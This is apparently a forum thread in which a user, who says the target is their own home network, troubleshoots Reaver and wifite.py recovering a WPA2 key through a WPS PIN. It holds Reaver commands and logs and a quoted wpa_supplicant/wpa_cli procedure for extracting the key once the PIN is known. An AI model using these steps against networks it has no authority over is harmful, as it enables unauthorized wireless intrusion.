wifite.py + reaver to retrieve WPA2 pass phrase

[hannah]

I am running these tools against my home network.

I am running first wifite.py (http://www.backtrack-linux.org/forum...ad.php?t=48161) and then reaver.
I know wifite.py is very capable of cracking WPS enabled APs. However this time it cracked the correct WPS pin but not the passphrase. Hence I run reaver to crack the passphrase. I ran it 4 times and everytime it retrieved 4 different passphrase and none of them are correct. Please see the detailed output as below.

Would be keen to know the reason for this please.

Regards

Code:

root@bt:~# uname -a
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux

root@bt:~# reaver -i mon0 -b D0:7D:33:6E:A7:B7 -p 18794786 -c 11 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 11
[+] Waiting for beacon from D0:7D:33:6E:A7:B7
[+] Associated with D0:7D:33:6E:A7:B7 (ESSID: Security)
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 11 seconds
[+] WPS PIN: '18794786'
[+] WPA PSK: 'aa0a90d4868af15113e51e818e437a6726f75efc7c38d1c9947f26377324f389'
[+] AP SSID: 'Security'
[+] Nothing done, nothing to save.
root@bt:~# reaver -i mon0 -b D0:7D:33:6E:A7:B7 -p 18794786 -c 11 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 11
[+] Waiting for beacon from D0:7D:33:6E:A7:B7
[+] Associated with D0:7D:33:6E:A7:B7 (ESSID: Security)
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 26 seconds
[+] WPS PIN: '18794786'
[+] WPA PSK: '3b3c94285738ab32c88274bebbc7fc9641c2ed123ada4e55dca897ca57ce8e05'
[+] AP SSID: 'Security'
You have new mail in /var/mail/root
root@bt:~# reaver -i mon0 -b D0:7D:33:6E:A7:B7 -p 18794786 -c 11 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 11
[+] Waiting for beacon from D0:7D:33:6E:A7:B7
[+] Associated with D0:7D:33:6E:A7:B7 (ESSID: Security)
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 30 seconds
[+] WPS PIN: '18794786'
[+] WPA PSK: '6437b12e41d82c03f53f23993b79a03b728dbc4dffae116ade802cb3a941e6ec'
[+] AP SSID: 'Security'
You have new mail in /var/mail/root
root@bt:~# reaver -i mon0 -b D0:7D:33:6E:A7:B7 -p 18794786 -c 11 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 11
[+] Waiting for beacon from D0:7D:33:6E:A7:B7
[+] Associated with D0:7D:33:6E:A7:B7 (ESSID: Security)
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 13 seconds
[+] WPS PIN: '18794786'
[+] WPA PSK: '9402de2456f497009bd2725123dd97c05b9a947373187893eb41790024185283'
[+] AP SSID: 'Security'
[+] Nothing done, nothing to save.
root@bt:~#

[hannah]

I see the topic is moved. Hopefully someone will respond now.
Thanks

[hannah]

Hi ya all.. I am hoping at least someone can point me to some other resources where I can possibly find the answer my query..

regards

[longjidin]

Ok i think better you follow this http://code.google.com/p/wifite/ and this https://github.com/derv82/wifite with this tutorial confirm you can understand how the wifite+reaver working together......


Good Luck

[hannah]

Ok i think better you follow this http://code.google.com/p/wifite/ and this https://github.com/derv82/wifite with this tutorial confirm you can understand how the wifite+reaver working together......


Good Luck

Hey thanks.. I think I have moved on from wifite.py (great tool really). This now pertains only to Reaver tool. Question is for the same WPS Pin why does Reaver crack different passphrases (none of them work by the way).?

[hannah]

ok reviving this old post of mine..
I have now installed Reaver v1.3 and still trying to crack my AP..it's getting the correct pin but now the passphrase

Code:

root@bt:~# reaver -i mon0 -b F0:7D:68:6E:A7:E8 -e Security -c 11 -p 18794786

Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from F0:7D:68:6E:A7:E8
[+] Associated with F0:7D:68:6E:A7:E8 (ESSID: Security)
[+] WPS PIN: '18794786'
[+] WPA PSK: '238ae6076460e99efbf7a5e3940db4fbe7f35cf61a7972444f04bfd3847941e7'
[+] AP SSID: 'Security'

root@bt:~# reaver -i mon0 -b F0:7D:68:6E:A7:E8 -e Security -c 11 -p 18794786

Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from F0:7D:68:6E:A7:E8
[+] Associated with F0:7D:68:6E:A7:E8 (ESSID: Security)
[+] WPS PIN: '18794786'
[+] WPA PSK: '395038100f4cf0940101bd7ec69adab509af5f189af1931db576d9198160819c'
[+] AP SSID: 'Security'

Quite curious here..

Have looked over here:
http://code.google.com/p/reaver-wps/issues/list

But nothing really pointing me to the right direction. I just had a feeling that Reaver v1.3 is a bit better than Reaver v1.4 however I am still getting the same error.

Any pointer..It's really a reaver issue and not wifite.py issue.

[VulpiArgenti]

If the PIN is correct, you can use wpa_supplicant and wpa_cli to authenticate to the router, and then read the PSK either from the router config page or wpa_supplicant.conf. There is info on how to do this in the Reaver googlecode issues section. Reaver often gives me the PIN but not the PSK, and I can confirm this method works.

[hannah]

If the PIN is correct, you can use wpa_supplicant and wpa_cli to authenticate to the router, and then read the PSK either from the router config page or wpa_supplicant.conf. There is info on how to do this in the Reaver googlecode issues section. Reaver often gives me the PIN but not the PSK, and I can confirm this method works.

First of all thanks a lot to VulpiArgenti. Let me first warn the readers that this going to be a long message.

I am still not able to successfully retrieve the passphrase though I know this method works as I have tested it with other routers.

Explaining method: All credit goes to this poster:

http://code.google.com/p/reaver-wps/.../detail?id=203

________

First, set yourself up a very basic wpa_supplicant.conf in /etc/wpa_supplicant.conf:
--
ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
update_config=1
--

Second, start wpa_supplicant in daemon mode:
wpa_supplicant -Dwext -iwlan0 -c/etc/wpa_supplicant.conf –B

Third, run wpa_cli, and verify that it's working by issuing command 'status'.
You should see wpa_state=INACTIVE

Fourth, lets add our BSSID and PIN:
wpa_reg <bssid> <wps pin>
wps_reg aa:bb:cc:dd:ee:ff 18794786

You should see an "OK". Wait a few more seconds as wpa_supplicant picks up the BSSID
and tries to associate and perform key negotiation. What you want to see is
"CTRL-EVENT-CONNECTED", which will indicate that the PIN was accepted and that you're
now associated.

At this point, if you were to exit wpa_cli, you could run dhclient on wlan0
and would be offered an IP from the AP, assuming DHCPd were enabled.

Go ahead and type the command 'save' at wpa_cli terminal, which should output another "OK".
This will update the wpa_supplicant.conf file, as specified from the command line,
with a static configuration for this new network.

Verify by: cat /etc/wpa_supplicant.conf

If all went well, you should have a line under this new network titled 'psk'.
That is the ssid passphrase
___________

Now here is my output of the events:

I have created the wpa_supplicant.conf and then start the wpa_supplicant in daemon mode in one terminal

Then I open another terminal and start wpa_cli
Please see the output of these two terminals:

Code:

root@bt:/etc# wpa_cli
wpa_cli v0.6.9
Copyright (c) 2004-2009, Jouni Malinen <j@w1.fi> and contributors

This program is free software. You can distribute it and/or modify it
under the terms of the GNU General Public License version 2.

Alternatively, this software may be distributed under the terms of the
BSD license. See README and COPYING for more details.


Selected interface 'wlan0'

Interactive mode

> status
wpa_state=INACTIVE

> wps_reg aa:bb:cc:dd:ee:ff 18794786
OK
> <2>CTRL-EVENT-SCAN-RESULTS 
<2>WPS-AP-AVAILABLE 
<2>Trying to associate with aa:bb:cc:dd:ee:ff (SSID='Security' freq=2462 MHz)
<2>CTRL-EVENT-SCAN-RESULTS 
<2>WPS-AP-AVAILABLE 
<2>Associated with aa:bb:cc:dd:ee:ff
<2>CTRL-EVENT-EAP-STARTED EAP authentication started
<2>CTRL-EVENT-EAP-METHOD EAP vendor 14122 method 1 (WSC) selected
<2>CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
<2>CTRL-EVENT-SCAN-RESULTS 
<2>WPS-AP-AVAILABLE-PIN 

root@bt:/etc#

and corresponding wpa_supplicant deamon output:

Code:

root@bt:/etc# wpa_supplicant -Dwext -iwlan0 -c/etc/wpa_supplicant.conf –B
WPS-AP-AVAILABLE 
WPS-AP-AVAILABLE 
WPS-AP-AVAILABLE 
Trying to associate with aa:bb:cc:dd:ee:ff (SSID='Security' freq=2462 MHz)
WPS-AP-AVAILABLE 
Associated with aa:bb:cc:dd:ee:ff
WPA: No wpa_ie set - cannot generate msg 2/4
CTRL-EVENT-EAP-STARTED EAP authentication started
CTRL-EVENT-EAP-METHOD EAP vendor 14122 method 1 (WSC) selected
WPA: No wpa_ie set - cannot generate msg 2/4
WPA: No wpa_ie set - cannot generate msg 2/4
WPA: No wpa_ie set - cannot generate msg 2/4
WPA: No wpa_ie set - cannot generate msg 2/4
WPA: No wpa_ie set - cannot generate msg 2/4
WPA: No wpa_ie set - cannot generate msg 2/4

So somehow it's not working for me..

One time it did work and I saved the wpa_supplicant.conf file but the passphrase was garbage again.

Code:

root@bt:/etc# cat wpa_supplicant.conf
ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
update_config=1

network={
	ssid="Security"
	bssid=aa:bb:cc:dd:ee:ff
	psk=692c966e5ff1eff5e16c698036d87d5bbe94cdb73d7f14b64eac6331be561019
	proto=RSN
	key_mgmt=WPA-PSK
	pairwise=CCMP
	auth_alg=OPEN

Driving me nuts at the moment.

[VulpiArgenti]

CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys

This suggests the PIN is wrong, or the AP is locked, or wpa_cli is not configured correctly (for your router).

You could look at further commands to wpa_cli eg increase debugging level, force reassociation (see man), and also run wpa_supplicant with debug flag (-dd). Could also attempt to reconfigure the router with wpa_supplicant?? That's the limit of my knowledge I'm afraid.

[Footpad]

Just to clarify, there seems to be some confusion between the passphrase and the pre-shared key (PSK) here.

The passphrase is what you configure on your router/AP. Similar to a password, and (relatively) easy to remember. Your router/AP does not use this for encryption. The actual key (PSK) is calculated through applying a key-derivation function which is salted with the router's SSID

VulpiArgenti's post above sounds about right. I was messing about with my own network settings yesterday - configuring network settings without using either network manager or WICD. I ran into the same issue with the disconnect event a number of times. Seems that there's a few different ways of configuring the wpa_supplicant.conf file, and that the network can be a bit fussy about that.